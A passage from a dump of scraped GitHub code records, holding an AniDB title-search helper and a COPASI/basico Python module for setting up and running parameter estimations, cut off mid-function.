{"api_name": "os.path.dirname", "line_number": 37, "usage_type": "call"}, {"api_name": "sktime.__file__", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sktime.classification.distance_based.KNeighborsTimeSeriesClassifier", "line_number": 50, "usage_type": "call"}, {"api_name": "sktime.classification.distance_based.KNeighborsTimeSeriesClassifier", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 53, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PowerTransformer", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 63, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 73, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 74, "usage_type": "call"}, {"api_name": "sktime.transformations.series.acf.AutoCorrelationTransformer", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "call"}, {"api_name": "sktime.utils.data_io.load_from_tsfile_to_dataframe", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "sktime.utils.data_io.load_from_tsfile_to_dataframe", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "sktime.utils.data_processing.from_nested_to_2d_array", "line_number": 96, "usage_type": "call"}, {"api_name": "sktime.utils.data_processing.from_nested_to_2d_array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 101, "usage_type": "call"}, {"api_name": "sktime.utils.data_processing.from_nested_to_2d_array", "line_number": 112, "usage_type": "call"}, {"api_name": "sktime.utils.data_processing.from_nested_to_2d_array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 136, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "20064775840", "text": "from __future__ import absolute_import\nimport os\nimport xml.etree.cElementTree as etree\nfrom datetime import datetime, timedelta\n\nfrom appdirs import *\n\nfrom .helper import download_file\nfrom .models import *\n\n__version__ = \"0.1.0\"\n__author__ = \"Dennis Lutter\"\n\nANIME_LIST_URL = \"http://anidb.net/api/anime-titles.xml.gz\"\n\nclass Anidb(object):\n\n def __init__(self, cache_dir=None, auto_download=True, lang=None):\n if not cache_dir:\n self._cache_dir = user_cache_dir(\"simpleanidb\")\n if not os.path.isdir(self._cache_dir):\n os.mkdir(self._cache_dir)\n else:\n self._cache_dir = cache_dir\n if not os.path.isdir(self._cache_dir):\n raise ValueError(\"'%s' does not exist\" % self._cache_dir)\n elif not os.access(self._cache_dir, os.W_OK):\n raise IOError(\"'%s' is not writable\" % self._cache_dir)\n\n self.anime_list_path = os.path.join(\n self._cache_dir, \"anime-titles.xml.gz\")\n self.auto_download = auto_download\n self._xml = None\n self.lang = lang\n if not lang:\n self.lang = \"en\"\n\n def search(self, term):\n if not self._xml:\n try:\n self._xml = self._read_file(self.anime_list_path)\n except IOError:\n if self.auto_download:\n self.download_anime_list()\n self._xml = self._read_file(self.anime_list_path)\n else:\n raise\n\n term = term.lower()\n anime_ids = []\n for anime in self._xml.findall(\"anime\"):\n for title in anime.findall(\"title\"):\n if term in title.text.lower():\n anime_ids.append((int(anime.get(\"aid\")), anime))\n break\n return [Anime(self, aid, False, xml_node) for aid, xml_node in anime_ids]\n\n def anime(self, aid):\n return Anime(self, aid)\n\n def _read_file(self, path):\n f = open(path, 'rb')\n return etree.ElementTree(file=f)\n\n def download_anime_list(self, force=False):\n if not force and os.path.exists(self.anime_list_path):\n modified_date = datetime.fromtimestamp(\n os.path.getmtime(self.anime_list_path))\n if modified_date + timedelta(1) > datetime.now():\n return False\n return download_file(self.anime_list_path, ANIME_LIST_URL)\n", "repo_name": "lad1337/simpleanidb", "sub_path": "simpleanidb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2413, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 27, "usage_type": "call"}, {"api_name": "os.W_OK", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "xml.etree.cElementTree.ElementTree", "line_number": 63, "usage_type": "call"}, {"api_name": "xml.etree.cElementTree", "line_number": 63, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.getmtime", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 69, "usage_type": "name"}, {"api_name": "helper.download_file", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "17508869756", "text": "\"\"\"Submodule with utility methods for carrying out and plotting of parameter estimations.\n\nThe main function provided by this submodule is :func:`run_parameter_estimation`. Without any parameters, the\npreviously set up parameter estimation as stored in the file will be carried out. And the parameters found will\nbe returned.\n\nIt is also possible to set up parameter estimation problems from scratch. To make it as simple as possible, pandas\ndata frames are used, the mapping from the columns to the model element will be done implicitly by naming the\ncolumns like the corresponding model elements.\n\nExample:\n\n >>> from basico import *\n >>> m = model_io.load_example(\"LM-test1\")\n >>> print(get_fit_parameters())\n >>> print(get_parameters_solution())\n >>> run_parameter_estimation(method='Levenberg - Marquardt')\n >>> print(get_parameters_solution())\n\n\"\"\"\n\nimport pandas\nimport COPASI\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nimport logging\n\nAFFECTED_EXPERIMENTS = 'Affected Experiments'\nTASK_PARAMETER_ESTIMATION = 'Parameter Estimation'\n\ntry:\n from . import model_io\nexcept ValueError:\n import model_io\n\ntry:\n from builtins import ValueError\nexcept ImportError:\n pass\n\n\ndef num_experiment_files(**kwargs):\n \"\"\"Return the number of experiment files defined.\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: number of experiment files\n :rtype: int\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n return problem.getExperimentSet().size()\n\n\ndef get_experiment_names(**kwargs):\n \"\"\"Returns the list of experiment names\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: list of experiment names defined\n :rtype: [str]\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n result = []\n for i in range(problem.getExperimentSet().size()):\n experiment = problem.getExperimentSet().getExperiment(i)\n result.append(experiment.getObjectName())\n return result\n\n\ndef _get_experiment_keys(**kwargs):\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n result = []\n for i in range(problem.getExperimentSet().size()):\n experiment = problem.getExperimentSet().getExperiment(i)\n result.append(experiment.getKey())\n return result\n\n\ndef num_validations_files(**kwargs):\n \"\"\"Returns the number of cross validation experiment files\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: number of cross validation experiment files\n :rtype: int\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n return problem.getCrossValidationSet().size()\n\n\ndef _role_to_string(role):\n names = {\n COPASI.CExperiment.time: 'time',\n COPASI.CExperiment.ignore: 'ignored',\n COPASI.CExperiment.independent: 'independent',\n COPASI.CExperiment.dependent: 'dependent',\n }\n return names.get(role, COPASI.CExperiment.ignore)\n\n\ndef get_experiment(experiment, **kwargs):\n \"\"\"Returns the specified experiment.\n\n :param experiment: experiment name or index\n :type experiment: int or str or COPASI.CExperiment\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: the experiment or an error if none existent\n \"\"\"\n if not isinstance(experiment, COPASI.CExperiment):\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n exp_set = problem.getExperimentSet()\n\n if type(experiment) is int and experiment >= exp_set.size():\n raise ValueError('Experiment index out of bounds')\n exp = exp_set.getExperiment(experiment)\n if exp is not None:\n experiment = exp\n else:\n raise ValueError('No experiment for: {0}'.format(experiment))\n return experiment\n\n\ndef get_experiment_mapping(experiment, **kwargs):\n \"\"\"Retrieves a data frame of the experiment mapping.\n\n The resulting data frame will have the columns:\n * `column` (int): index of the column in the file\n * `type` (str): 'time', 'dependent', 'indepenent' or 'ignored'\n * 'mapping' (str): the name of the element it is mapped to\n * 'cn' (str): internal identifier\n\n :param experiment: the experiment to get the mapping from\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: data frame with the mapping as described\n :rtype: pandas.DataFrame\n \"\"\"\n experiment = get_experiment(experiment, **kwargs)\n\n obj_map = experiment.getObjectMap()\n rows = []\n for i in range(obj_map.getLastColumn() + 1):\n role = obj_map.getRole(i)\n cn = obj_map.getObjectCN(i)\n obj = ''\n if cn:\n obj = experiment.getObjectDataModel().getObject(COPASI.CCommonName(cn))\n if obj:\n obj = obj.getObjectDisplayName()\n\n rows.append({\n 'column': i,\n 'type': _role_to_string(role),\n 'mapping': obj,\n 'cn': cn,\n })\n\n return pandas.DataFrame(data=rows).set_index('column')\n\n\ndef _get_experiment_file(experiment):\n file_name_only = experiment.getFileNameOnly()\n model = experiment.getObjectDataModel()\n directory = os.path.dirname(model.getFileName())\n\n if os.path.exists(os.path.join(directory, file_name_only)):\n return os.path.join(directory, file_name_only)\n\n if os.path.exists(file_name_only):\n return file_name_only\n\n file_name = experiment.getFileName()\n if os.path.exists(file_name):\n return file_name\n\n raise ValueError('Experiment file {0} does not exist'.format(file_name_only))\n\n\ndef get_data_from_experiment(experiment, **kwargs):\n \"\"\"Returns the data of the given experiment as dataframe\n\n :param experiment: the experiment\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n - | `rename_headers` (bool): if true (default) the columns of the headers will be renamed\n | with the names of the element it is mapped to. Also all ignored columns will be removed from the\n | dataset\n\n :return: dataframe with experimental data\n :rtype: pandas.DataFrame\n \"\"\"\n experiment = get_experiment(experiment, **kwargs)\n experiment_file = _get_experiment_file(experiment)\n num_lines = sum(1 for line in open(experiment_file))\n header_row = experiment.getHeaderRow()\n have_headers = header_row < num_lines\n skip_idx = [x-1 for x in range(1, num_lines+1) if\n not (experiment.getFirstRow() <= x <= experiment.getLastRow())]\n\n if 'rename_headers' in kwargs:\n rename_headers = kwargs['rename_headers']\n else:\n rename_headers = True\n\n if have_headers and rename_headers:\n skip_idx.insert(0, header_row-1)\n\n drop_cols = []\n headers = {}\n obj_map = experiment.getObjectMap()\n if rename_headers:\n count = 0\n for i in range(obj_map.size()):\n role = obj_map.getRole(i)\n\n if role == COPASI.CExperiment.time:\n headers[count] = 'Time'\n count += 1\n\n elif role == COPASI.CExperiment.ignore:\n drop_cols.append(i)\n\n else:\n cn = obj_map.getObjectCN(i)\n obj = experiment.getObjectDataModel().getObject(COPASI.CCommonName(cn))\n if obj:\n headers[count] = obj.getObjectDisplayName()\n count += 1\n else:\n drop_cols.append(i)\n\n if rename_headers or not have_headers:\n df = pandas.read_csv(experiment_file,\n sep=experiment.getSeparator(),\n header=None,\n skiprows=skip_idx)\n else:\n df = pandas.read_csv(experiment_file,\n sep=experiment.getSeparator(),\n skiprows=skip_idx)\n\n if not rename_headers:\n return df\n\n all_columns = list(df.columns)\n for i in range(obj_map.size(), len(all_columns)):\n # drop additional columns not mapped\n drop_cols.append(all_columns[i])\n\n if any(drop_cols):\n df.drop(drop_cols, axis=1, inplace=True)\n\n df.rename(columns=headers, inplace=True)\n\n return df\n\n\ndef get_experiment_data_from_model(model=None):\n \"\"\"Returns all experimental data from the model\n\n :param model: the model to get the data from\n :type model: COPASI.CDataModel or None\n :return: list of dataframes with experimental data (with columns renamed and unmapped columns dropped)\n :rtype: [pandas.DataFrame]\n \"\"\"\n if model is None:\n model = model_io.get_current_model()\n result = []\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n experiments = problem.getExperimentSet()\n assert (isinstance(experiments, COPASI.CExperimentSet))\n\n num_experiments = experiments.getExperimentCount()\n if num_experiments == 0:\n return result\n\n for i in range(num_experiments):\n experiment = experiments.getExperiment(i)\n df = get_data_from_experiment(experiment, rename_headers=True)\n result.append(df)\n\n return result\n\n\ndef get_fit_item_template(include_local=False, include_global=False, default_lb=0.001, default_ub=1000, model=None):\n \"\"\"Returns a template list of items to be used for the parameter estimation\n\n :param include_local: boolean, indicating whether to include local parameters\n :type include_local: bool\n\n :param include_global: boolean indicating whether to include global parameters\n :type include_global: bool\n\n :param default_lb: default lower bound to be used\n :type default_lb: float\n\n :param default_ub: default upper bound to be used\n :type default_ub: float\n\n :param model: the model or None\n :type model: COPASI.CDataModel or None\n\n :return: List of dictionaries, with the local / global parameters in the format needed by:\n :func:`set_fit_parameters`.\n :rtype: [{}]\n \"\"\"\n\n if model is None:\n model = model_io.get_current_model()\n\n result = []\n\n if include_global:\n\n for mv in model.getModel().getModelValues():\n result.append({\n 'name': mv.getObjectDisplayName(),\n 'lower': default_lb,\n 'upper': default_ub\n })\n\n if include_local:\n\n from . import model_info\n local_params = model_info.get_reaction_parameters().reset_index()\n for name, local in zip(local_params['name'], local_params['type']):\n\n if local == 'local':\n result.append({\n 'name': name,\n 'lower': default_lb,\n 'upper': default_ub\n })\n\n return result\n\n\ndef get_fit_parameters(model=None):\n \"\"\"Returns a data frame with all fit parameters\n\n The resulting dataframe will have the following columns:\n\n * `name`: the name of the fit parameter\n * `lower`: the lower bound of the parameter\n * `upper`: the upper bound of the parameter\n * `start`: the start value\n * | `affected`: a list of all experiments (names) the fit parameter should apply to. If empty the parameter should\n | be varied for all experiments.\n * `cn`: internal identifier\n\n :param model: the model to get the fit parameters from\n :type model: COPASI.CDataModel or None\n\n :return: data frame with the fit parameters\n :rtype: pandas.DataFrame\n \"\"\"\n if model is None:\n model = model_io.get_current_model()\n\n pe_task = model.getTask(TASK_PARAMETER_ESTIMATION)\n problem = pe_task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n items = problem.getOptItemList()\n data = []\n\n for i in range(len(items)):\n item = items[i]\n obj = model.getObject(COPASI.CCommonName(item.getObjectCN())).toObject().getObjectParent()\n name = obj.getObjectDisplayName()\n data.append({\n 'name': name,\n 'lower': item.getLowerBound(),\n 'upper': item.getUpperBound(),\n 'start': item.getStartValue(),\n 'affected': _get_affected_experiments(item),\n 'cn': item.getObjectCN(),\n })\n\n if not data:\n return None\n\n return pandas.DataFrame(data=data).set_index('name')\n\n\ndef set_fit_parameters(fit_parameters, model=None):\n \"\"\"Replaces all existing fit items with the ones provided\n\n :param fit_parameters: the fit parameters as pandas data frame of list of dictionaries with keys:\n\n * 'name' str: the display name of the model element to map the column to.\n * 'lower': the lower bound of the parameter\n * 'upper': the upper bound of the parameter\n * 'start' (float, optional): the start value\n * 'cn' (str, optional): internal identifier\n\n :type fit_parameters: pandas.DataFrame or [{}]\n :param model: the model or None\n :type model: COPASI.CDataModel or None\n :return: None\n \"\"\"\n # type: (pandas.DataFrame, COPASI.CDataModel)\n if model is None:\n model = model_io.get_current_model()\n\n if type(fit_parameters) is list:\n fit_parameters = pandas.DataFrame(data=fit_parameters)\n\n pe_task = model.getTask(TASK_PARAMETER_ESTIMATION)\n problem = pe_task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n while problem.getOptItemSize() > 0:\n problem.removeOptItem(0)\n\n for i in range(len(fit_parameters)):\n item = fit_parameters.iloc[i]\n cn = None\n name = None\n\n if 'cn' in item:\n cn = COPASI.CCommonName(item.cn)\n\n if 'name' in item:\n name = item['name']\n if not cn:\n obj = model.findObjectByDisplayName(name)\n if obj:\n cn = obj.getCN()\n if _get_role_for_reference(obj.getObjectName()) == COPASI.CExperiment.ignore:\n cn = obj.getValueReference().getCN()\n\n if not cn:\n logging.warning('object {0} not found'.format(name))\n continue\n\n fit_item = problem.addFitItem(cn)\n assert (isinstance(fit_item, COPASI.CFitItem))\n if 'lower' in item:\n fit_item.setLowerBound(COPASI.CCommonName(str(item['lower'])))\n if 'upper' in item:\n fit_item.setUpperBound(COPASI.CCommonName(str(item['upper'])))\n if 'start' in item:\n fit_item.setStartValue(float(item['start']))\n\n\ndef _get_name_for_key(key):\n factory = COPASI.CRootContainer.getKeyFactory()\n obj = factory.get(key)\n if not obj:\n return ''\n return obj.getObjectName()\n\n\ndef _get_affected_experiments(optitem):\n # type: (COPASI.CCopasiParameterGroup) -> [str]\n result = []\n affected = optitem.getGroup(AFFECTED_EXPERIMENTS)\n assert (isinstance(affected, COPASI.CCopasiParameterGroup))\n for i in range(affected.size()):\n current = affected.getParameter(i)\n result.append(_get_name_for_key(current.getStringValue()))\n return result\n\n\ndef get_parameters_solution(model=None):\n \"\"\"Returns the solution found for the fit parameters as data frame\n\n The resulting data frame will have the columns:\n\n * `name`: the name of the parameter\n * `lower`: the parameters lower bound\n * `upper`: the parameters upper bound\n * `sol`: the solution found in the last run (or NaN, if not run yet, or no solution found)\n * `affected`: the experiments this parameter applies to (or an empty list if it applies to all)\n\n :param model: the model to use, or None\n :type model: COPASI.CDataModel or None\n :return: data frame as described\n :rtype: pandas.DataFrame\n \"\"\"\n if model is None:\n model = model_io.get_current_model()\n pe_task = model.getTask(TASK_PARAMETER_ESTIMATION)\n problem = pe_task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n solution = problem.getSolutionVariables()\n items = problem.getOptItemList()\n assert(solution.size() == len(items))\n data = []\n\n for i in range(solution.size()):\n item = items[i]\n sol = solution.get(i)\n obj = model.getObject(COPASI.CCommonName(item.getObjectCN())).toObject().getObjectParent()\n name = obj.getObjectDisplayName()\n data.append({\n 'name': name,\n 'lower': item.getLowerBound(),\n 'upper': item.getUpperBound(),\n 'sol': sol,\n 'affected': _get_affected_experiments(item),\n })\n\n if not data:\n return None\n\n return pandas.DataFrame(data=data).set_index('name')\n\n\ndef _get_role_for_reference(reference_name):\n role_map = {\n 'Concentration': COPASI.CExperiment.dependent,\n 'ParticleNumber': COPASI.CExperiment.dependent,\n 'ParticleNumberRate': COPASI.CExperiment.dependent,\n 'InitialConcentration': COPASI.CExperiment.independent,\n 'InitialParticleNumber': COPASI.CExperiment.independent,\n 'InitialValue': COPASI.CExperiment.independent,\n 'InitialVolume': COPASI.CExperiment.independent,\n 'Rate': COPASI.CExperiment.dependent,\n 'Value': COPASI.CExperiment.dependent,\n 'Volume': COPASI.CExperiment.dependent,\n }\n return role_map.get(reference_name, COPASI.CExperiment.ignore)\n\n\ndef add_experiment(name, data, **kwargs):\n \"\"\"Adds a new experiment to the model.\n\n This method adds a new experiment file to the parameter estimation task. The provided\n data frame will be written into the current directory as `experiment_name.txt` unless a filename\n has been provided.\n\n The mapping between the columns and the model elements should be done by having the columns of the data\n frame be model element names in question. So for example `[A]` to note that the transient concentrations\n of a species `A` is to be mapped as dependent variable. or `[A]_0` to note that the initial concentration of\n a species `A` is to be mapped as independent variable.\n\n :param name: the name of the experiment\n :type name: str\n :param data: the data frame with the experimental data\n :type data: pandas.DataFrame\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n - | `file_name` (str): the file name to save the experimental data to (otherwise it will be name.txt)\n\n :return: the filename of the generated data file\n :rtype: str\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n exp_set = problem.getExperimentSet()\n assert (isinstance(exp_set, COPASI.CExperimentSet))\n exp = exp_set.getExperiment(name)\n if exp is not None:\n logging.error('An experiment with the name {0} already exists'.format(name))\n return None\n\n # save data as tsv\n\n file_name = os.path.abspath(os.path.join(os.path.curdir, name + '.txt'))\n if 'file_name' in kwargs:\n file_name = kwargs['file_name']\n\n assert (isinstance(data, pd.DataFrame))\n data.to_csv(file_name, sep='\\t', header=True, index=False)\n # create experiment\n\n exp = COPASI.CExperiment(model)\n exp = exp_set.addExperiment(exp)\n info = COPASI.CExperimentFileInfo(exp_set)\n info.setFileName(file_name)\n info.sync()\n exp.setObjectName(name)\n exp.setFileName(file_name)\n exp.setHeaderRow(1)\n exp.setFirstRow(1)\n exp.setLastRow(len(data)+1)\n\n columns = data.columns.to_list()\n if 'time' in [col.lower() for col in columns]:\n exp.setExperimentType(COPASI.CTaskEnum.Task_timeCourse)\n else:\n exp.setExperimentType(COPASI.CTaskEnum.Task_steadyState)\n\n obj_map = exp.getObjectMap()\n num_cols = len(columns)\n obj_map.setNumCols(num_cols)\n for i in range(num_cols):\n role = COPASI.CExperiment.ignore\n current = columns[i]\n if current.lower() == 'time':\n role = COPASI.CExperiment.time\n else:\n obj = model.findObjectByDisplayName(current)\n if obj is None:\n logging.warning(\"Can't find model element for {0}\".format(current))\n else:\n role = _get_role_for_reference(obj.getObjectName())\n obj_map.setObjectCN(i, obj.getCN())\n obj_map.setRole(i, role)\n\n exp.calculateWeights()\n exp_set.compile(model.getModel().getMathContainer())\n\n return file_name\n\n\ndef run_parameter_estimation(**kwargs):\n \"\"\"Runs the parameter estimation task as specified:\n\n The following are valid methods to be used for the parameter estimation task.\n\n Current Solution:\n\n * `Current Solution Statistics`,\n\n Global Methods:\n\n * `Random Search`,\n * `Simulated Annealing`,\n * `Differential Evolution`,\n * `Scatter Search`,\n * `Genetic Algorithm`,\n * `Evolutionary Programming`,\n * `Genetic Algorithm SR`,\n * `Evolution Strategy (SRES)`,\n * `Particle Swarm`,\n\n Local Methods:\n\n * `Levenberg - Marquardt`,\n * `Hooke & Jeeves`,\n * `Nelder - Mead`,\n * `Steepest Descent`,\n * `NL2SOL`,\n * `Praxis`,\n * `Truncated Newton`,\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n - | `method` (str): one of the strings from above\n\n - | `randomize_start_values` (bool): if true, parameters will be randomized before starting otherwise the\n | parameters starting value will be taken.\n\n - | `calculate_statistics` (bool): if true, the statistics will be calculated at the end of the task\n\n - | `create_parametersets` (bool): if true, parameter sets will be created for all experiments\n\n - `use_initial_values` (bool): whether to use initial values\n\n - `scheduled` (bool): sets whether the task is scheduled or not\n\n - `update_model` (bool): sets whether the model should be updated, or reset to initial conditions.\n\n :return: the solution for the fit parameters see :func:`get_get_parameters_solution`.\n :rtype: pandas.DataFrame\n \"\"\"\n model = kwargs.get('model', model_io.get_current_model())\n assert (isinstance(model, COPASI.CDataModel))\n\n task = model.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n if 'scheduled' in kwargs:\n task.setScheduled(kwargs['scheduled'])\n\n if 'update_model' in kwargs:\n task.setUpdateModel(kwargs['update_model'])\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n old_create_parameter_sets = problem.getCreateParameterSets()\n # old_calculate_statistics = problem.getCalculateStatistics()\n # old_randomize_start_values = problem.getRandomizeStartValues()\n\n problem.setCreateParameterSets(True)\n\n if 'method' in kwargs:\n method = kwargs['method']\n if isinstance(method, int):\n task.setMethodType(method)\n else:\n task.setMethodType(COPASI.CCopasiMethod_TypeNameToEnum(method))\n\n if 'randomize_start_values' in kwargs:\n problem.setRandomizeStartValues(bool(kwargs['randomize_start_values']))\n\n if 'calculate_statistics' in kwargs:\n problem.setCalculateStatistics(bool(kwargs['calculate_statistics']))\n\n if 'create_parametersets' in kwargs:\n problem.setCreateParameterSets(bool(kwargs['create_parametersets']))\n\n use_initial_values = kwargs.get('use_initial_values', True)\n\n result = task.initializeRaw(COPASI.CCopasiTask.OUTPUT_UI)\n if not result:\n logging.error(\"Error while initializing the simulation: \" +\n COPASI.CCopasiMessage.getLastMessage().getText())\n else:\n result = task.processRaw(use_initial_values)\n if not result:\n logging.error(\"Error while running the simulation: \" +\n COPASI.CCopasiMessage.getLastMessage().getText())\n\n problem.setCreateParameterSets(old_create_parameter_sets)\n\n return get_parameters_solution(model)\n\n\ndef get_simulation_results(**kwargs):\n \"\"\"Runs the current solution statistics and returns result of simulation and experimental data\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: tuple of lists of experiment data, and a list of simulation data\n :rtype: ([pandas.DataFrame],[pandas.DataFrame])\n \"\"\"\n import basico\n dm = kwargs.get('model', model_io.get_current_model())\n\n task = dm.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n experiments = problem.getExperimentSet()\n assert (isinstance(experiments, COPASI.CExperimentSet))\n\n result = []\n num_experiments = experiments.getExperimentCount()\n if num_experiments == 0:\n return result\n\n solution = run_parameter_estimation(method='Current Solution Statistics')\n\n model = dm.getModel()\n\n exp_data = []\n sim_data = []\n\n for i in range(num_experiments):\n change_set = COPASI.DataObjectSet()\n experiment = experiments.getExperiment(i)\n exp_name = experiment.getObjectName()\n df = get_data_from_experiment(experiment, rename_headers=True)\n mapping = get_experiment_mapping(experiment)\n\n # set independent values for that experiment\n independent = mapping[mapping.type == 'independent']\n num_independent = independent.shape[0]\n for j in range(num_independent):\n name = independent.iloc[j].mapping\n cn = independent.iloc[j].cn\n value = df.iloc[0][name]\n obj = dm.getObject(COPASI.CCommonName(cn))\n if obj is not None:\n if cn.endswith('InitialConcentration'):\n obj.getObjectParent().setInitialConcentration(value)\n else:\n obj.getObjectParent().setInitialValue(value)\n change_set.append(obj)\n\n if change_set.size() > 0:\n model.updateInitialValues(change_set)\n\n for j in range(solution.shape[0]):\n name = solution.iloc[j].name\n value = solution.iloc[j].sol\n if np.isnan(value):\n continue\n affected = solution.iloc[j].affected\n if any(affected) and exp_name not in affected:\n continue\n\n basico.set_reaction_parameters(name, value=value)\n\n duration = df.iloc[-1].Time\n data = basico.run_time_course(duration=duration)\n\n exp_data.append(df)\n sim_data.append(data)\n\n return exp_data, sim_data\n\n\ndef plot_per_experiment(**kwargs):\n \"\"\"\n This function creates one figure per experiment defined, with plots of all dependent variables\n and their fit in it.\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: array of tuples (fig, ax) for the figures created\n \"\"\"\n dm = kwargs.get('model', model_io.get_current_model())\n\n task = dm.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n experiments = problem.getExperimentSet()\n assert (isinstance(experiments, COPASI.CExperimentSet))\n\n result = []\n num_experiments = experiments.getExperimentCount()\n if num_experiments == 0:\n return result\n\n exp_data, sim_data = 